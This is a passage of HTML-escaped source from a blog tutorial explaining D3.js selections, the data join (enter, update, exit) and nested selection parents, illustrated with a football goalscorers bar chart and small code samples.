parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;x&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;y&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;y&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;goals&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;width&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; barWidth&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;height&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;height&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;goals&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On such a basic chart, there&#39;s not too much difference between the two. But the D3 API allows you to also consider a couple of extra states for your data:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;What happens when new data has to enter the DOM, or old and unneeded DOM elements need to exit?&lt;/li&gt;
&lt;li&gt;If you&#39;ve got a lot of complex data, how do you link your source data to your DOM elements?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Let&#39;s go back to our goalscorers chart. We can turn it into an animated chart which shows cumulative total goals for Crystal Palace players across the 38 matches in the 2024/25 season:&lt;/p&gt;
&lt;bar-race class=&quot;breakout&quot;&gt;
&lt;/bar-race&gt;
&lt;p&gt;This feels like a more complex arrangement but, as far as the DOM is concerned, this is still essentially the same as what we had before: an &lt;code&gt;&amp;lt;svg&amp;gt;&lt;/code&gt; with bunch of &lt;code&gt;&amp;lt;rect&amp;gt;&lt;/code&gt; elements. The primary difference is the data - there&#39;s more of it, it changes, and we&#39;re using it in a more complex way. To achieve this with the vanilla Web APIs, we&#39;d need to start taking on more complicated-sounding work. Chiefly:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Identifying when data has changed&lt;/li&gt;
&lt;li&gt;Knowing which DOM element corresponds to which datum&lt;/li&gt;
&lt;li&gt;What to do when new data turns up&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Surprise: D3 does all of those things under the hood. In this chart, the code that looks after generating bars is very similar to how it looked before.&lt;/p&gt;
&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;bars&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;player&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;join&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;enter&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt;&lt;br /&gt;      enter&lt;br /&gt;        &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;append&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;rect&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;        &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;fill&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;colour&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;player&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;        &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;width&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;54&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;        &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;x&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; i&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;i&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;update&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; update&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;y&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;y&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;goals&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;height&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;height&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;goals&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;data&lt;/code&gt; method now takes an accessor function to provide a key, which lets D3 associate DOM elements to specific bits of data, and the &lt;code&gt;join&lt;/code&gt; method now takes two functions: &lt;code&gt;enter&lt;/code&gt; and &lt;code&gt;update&lt;/code&gt;. The former creates a new &lt;code&gt;&amp;lt;rect&amp;gt;&lt;/code&gt; element in the DOM when a player scores their first goal and joins the dataset, and the latter is the identity function. A third function can be provided for &lt;code&gt;exit&lt;/code&gt;, but this isn&#39;t used here.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;y&lt;/code&gt; and &lt;code&gt;height&lt;/code&gt; attributes are then set on the merged outputs of the &lt;code&gt;enter&lt;/code&gt; and &lt;code&gt;update&lt;/code&gt; selections, which is the selection that the &lt;code&gt;join&lt;/code&gt; method returns. The &lt;code&gt;x&lt;/code&gt;, &lt;code&gt;y&lt;/code&gt;, &lt;code&gt;colour&lt;/code&gt; and &lt;code&gt;height&lt;/code&gt; functions are defined elsewhere, but these will return the relevant values for each attribute.&lt;/p&gt;
&lt;p&gt;We have now stumbled upon the most sacred D3 concept: the magical data join. You&#39;ll often see it visualised as a Venn diagram:&lt;/p&gt;
&lt;svg width=&quot;100%&quot; style=&quot;max-height:400px;font-size:var(--size-six);font-family:Source Code Pro,Monospace;isolation:isolate&quot; viewBox=&quot;0 0 450 300&quot;&gt;
  &lt;text x=&quot;160&quot; y=&quot;16&quot; text-anchor=&quot;middle&quot; style=&quot;fill:var(--text)&quot;&gt;Data&lt;/text&gt;
  &lt;text x=&quot;290&quot; y=&quot;16&quot; text-anchor=&quot;middle&quot; style=&quot;fill:var(--text)&quot;&gt;Elements&lt;/text&gt;
  &lt;circle cx=&quot;160&quot; cy=&quot;150&quot; r=&quot;125&quot; style=&quot;fill:var(--aquamarine);&quot;&gt;&lt;/circle&gt;
  &lt;circle cx=&quot;290&quot; cy=&quot;150&quot; r=&quot;125&quot; style=&quot;mix-blend-mode:screen;fill:var(--amaranth-pink);&quot;&gt;&lt;/circle&gt;
  &lt;text x=&quot;100&quot; y=&quot;150&quot; text-anchor=&quot;middle&quot; style=&quot;fill:var(--onyx)&quot;&gt;Enter&lt;/text&gt;
  &lt;text x=&quot;225&quot; y=&quot;150&quot; text-anchor=&quot;middle&quot; style=&quot;fill:var(--onyx)&quot;&gt;Update&lt;/text&gt;
  &lt;text x=&quot;350&quot; y=&quot;150&quot; text-anchor=&quot;middle&quot; style=&quot;fill:var(--onyx)&quot;&gt;Exit&lt;/text&gt;
&lt;/svg&gt;
&lt;p&gt;Which is a nice representation for the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Data not bound to elements are sent to the &lt;code&gt;enter&lt;/code&gt; function&lt;/li&gt;
&lt;li&gt;Data already bound to elements are sent to the &lt;code&gt;update&lt;/code&gt; function&lt;/li&gt;
&lt;li&gt;Elements not bound to data are sent to the &lt;code&gt;exit&lt;/code&gt; function&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With this in mind - and, honestly, it&#39;s a lot - we can start addressing those original pain points.&lt;/p&gt;
&lt;h2 id=&quot;why-selectall-elements-that-don&#39;t-exist%3F&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/understanding-d3-selections/#why-selectall-elements-that-don&#39;t-exist%3F&quot;&gt;Why &lt;code&gt;selectAll&lt;/code&gt; elements that don&#39;t exist?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;That&#39;s the data join at work! Let&#39;s revisit our original code:&lt;/p&gt;
&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;svg&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;selectAll&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;circle&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;circleData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;join&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;circle&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cx&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;x&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cy&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;y&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;r&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;r&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;fill&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;#FBFBFF&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can now analyse what&#39;s going on with a bit more D3-specific panache:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;selectAll(&amp;quot;circle&amp;quot;)&lt;/code&gt; returns an empty selection, as there were no &lt;code&gt;&amp;lt;circle&amp;gt;&lt;/code&gt; elements nested inside the &lt;code&gt;&amp;lt;svg&amp;gt;&lt;/code&gt; container.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;data&lt;/code&gt; method binds the array of data to the selection. Three new selections are created under the hood, each representing the enter, update and exit states. These selections can be empty. The update selection is returned; the selection remains aware of the enter and exit states for later use.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;join&lt;/code&gt; method operates on the enter, update and exit selections, passing them as parameters to the associated callback functions.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;selectAll(&amp;quot;circle&amp;quot;)&lt;/code&gt; returned an empty selection, so the update and exit selections are empty. The enter selection callback operates on the supplied data, appending three &lt;code&gt;&amp;lt;circle&amp;gt;&lt;/code&gt; elements to the &lt;code&gt;&amp;lt;svg&amp;gt;&lt;/code&gt; container. The &lt;code&gt;attr&lt;/code&gt; function accepts either a string or a function - if the latter is provided, D3 will pass the individual datum as the first parameter.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;join&lt;/code&gt; method returns a new selection resulting from merging the enter and update selections together.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This might all feel a bit overblown - and, dare I say it, clunky - in the case of displaying static data once in the DOM. But D3&#39;s elegance comes from how it generalises extremely well across cases where there are multiple elements moving through the enter, update and exit states, which is often the case when veering into animated or interactive charts.&lt;/p&gt;
&lt;h2 id=&quot;why-append-a-circle-after-selecting-circles%3F&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/understanding-d3-selections/#why-append-a-circle-after-selecting-circles%3F&quot;&gt;Why &lt;code&gt;append&lt;/code&gt; a circle after selecting circles?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;That&#39;s also the data join at work! The &lt;code&gt;selectAll&lt;/code&gt; grabs the initial selection, but the &lt;code&gt;append&lt;/code&gt; on the enter selection specifically describes &lt;em&gt;what&lt;/em&gt; to do when there is data that&#39;s not bound to an element.&lt;/p&gt;
&lt;p&gt;You &lt;em&gt;could&lt;/em&gt; append a &lt;code&gt;&amp;lt;rect&amp;gt;&lt;/code&gt; instead, of course. What would happen if you did?&lt;/p&gt;
&lt;p&gt;Returning to the case of static data: nothing weird would happen. You&#39;d get a nice little &lt;code&gt;&amp;lt;rect&amp;gt;&lt;/code&gt; sitting inside your SVG container. But if you wanted to make something dynamic, well, when you re-ran the &lt;code&gt;selectAll&lt;/code&gt; you would once again receive an empty selection. And once again the bound data would go through the &lt;code&gt;enter&lt;/code&gt; state. And &lt;em&gt;another&lt;/em&gt; beautiful &lt;code&gt;&amp;lt;rect&amp;gt;&lt;/code&gt; would end up, perhaps unexpectedly, inside the SVG.&lt;/p&gt;
&lt;p&gt;Press the button to see that happening:&lt;/p&gt;
&lt;append-rect class=&quot;breakout&quot;&gt;
&lt;/append-rect&gt;
&lt;h2 id=&quot;why-can&#39;t-you-select-an-element-and-join-one-item%3F&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/understanding-d3-selections/#why-can&#39;t-you-select-an-element-and-join-one-item%3F&quot;&gt;Why can&#39;t you &lt;code&gt;select&lt;/code&gt; an element and &lt;code&gt;join&lt;/code&gt; &lt;em&gt;one&lt;/em&gt; item?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Technically, you &lt;em&gt;can&lt;/em&gt; if you&#39;re willing to fudge it. Sort of. But you shouldn&#39;t, because it&#39;s not right.&lt;/p&gt;
&lt;p&gt;It mostly comes down to parents.&lt;/p&gt;
&lt;p&gt;But first: semantics. The word &lt;em&gt;data&lt;/em&gt; is an English language hot mess, and is usually used in both its singular and plural forms; the singular would be &lt;em&gt;datum&lt;/em&gt;. Within the realm of D3 we should very much consider it plural. So it wouldn&#39;t really make &lt;em&gt;sense&lt;/em&gt; to try and bind multiple bits of data to a singular selection. In language terms, this is a closed case.&lt;/p&gt;
&lt;p&gt;But... why stop there?&lt;/p&gt;
&lt;p&gt;Within D3, data (plural!) is bound to a selection. A selection is an array of arrays of DOM elements.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;select&lt;/code&gt; and &lt;code&gt;selectAll&lt;/code&gt; both return the same core &lt;code&gt;Selection&lt;/code&gt; object, which contains fields for &lt;code&gt;_groups&lt;/code&gt; and &lt;code&gt;_parents&lt;/code&gt;. Imagine something like this:&lt;/p&gt;
&lt;pre class=&quot;language-javascript&quot;&gt;&lt;code class=&quot;language-javascript&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;export&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;Selection&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;_groups &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; groups&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;_parents &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; parents&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;  &lt;span class=&quot;token function&quot;&gt;constructor&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;groups&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; parents&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;_groups &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; groups&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;_parents &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; parents&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;  &lt;span class=&quot;token comment&quot;&gt;// ... a bunch of methods&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But &lt;code&gt;select&lt;/code&gt; and &lt;code&gt;selectAll&lt;/code&gt; are also a little sneaky. They&#39;re top-level selection functions, &lt;code&gt;d3.select&lt;/code&gt; and &lt;code&gt;d3.selectAll&lt;/code&gt;, which query the entire document and return selections with &lt;em&gt;one&lt;/em&gt; group containing a single or all elements.&lt;/p&gt;
&lt;p&gt;A selection also has its &lt;em&gt;own&lt;/em&gt; &lt;code&gt;select&lt;/code&gt; and &lt;code&gt;selectAll&lt;/code&gt; methods, however, which allow for nested selections. These return new selections limited to descendants of the original selection. In these new selections, elements of the old group become the new selection groups. The elements of the new selection are the matching descendant elements of the new groups.&lt;/p&gt;
&lt;p&gt;Let&#39;s illustrate that with this &lt;code&gt;table&lt;/code&gt;:&lt;/p&gt;
&lt;table style=&quot;border: 1px solid var(--text)&quot;&gt;
  &lt;tr&gt;
    &lt;td&gt;One&lt;/td&gt;
    &lt;td&gt;Two&lt;/td&gt;
    &lt;td&gt;Three&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Four&lt;/td&gt;
    &lt;td&gt;Five&lt;/td&gt;
    &lt;td&gt;Six&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;tr-ee class=&quot;breakout&quot;&gt;
&lt;/tr-ee&gt;
&lt;p&gt;This becomes important when we start to think about the data join. Specifically, the enter selection.&lt;/p&gt;
&lt;p&gt;In D3&#39;s data join, the parent of a new element created by the &lt;code&gt;.join()&lt;/code&gt; method is determined by the selection it&#39;s called on. The &lt;code&gt;selection.select()&lt;/code&gt; method returns a new selection where the group&#39;s parent is inherited from the original selection.&lt;/p&gt;
&lt;p&gt;Often, this is the &lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt; element because &lt;code&gt;d3.select&lt;/code&gt; will &lt;em&gt;always&lt;/em&gt; set the parent to the &lt;code&gt;&amp;lt;html&amp;gt;&lt;/code&gt; element.&lt;/p&gt;
&lt;p&gt;Let&#39;s break for a second here to check our understanding:&lt;/p&gt;
&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; data &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;y&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;r&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;25&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;d3&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;select&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;svg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;select&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;circle&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token 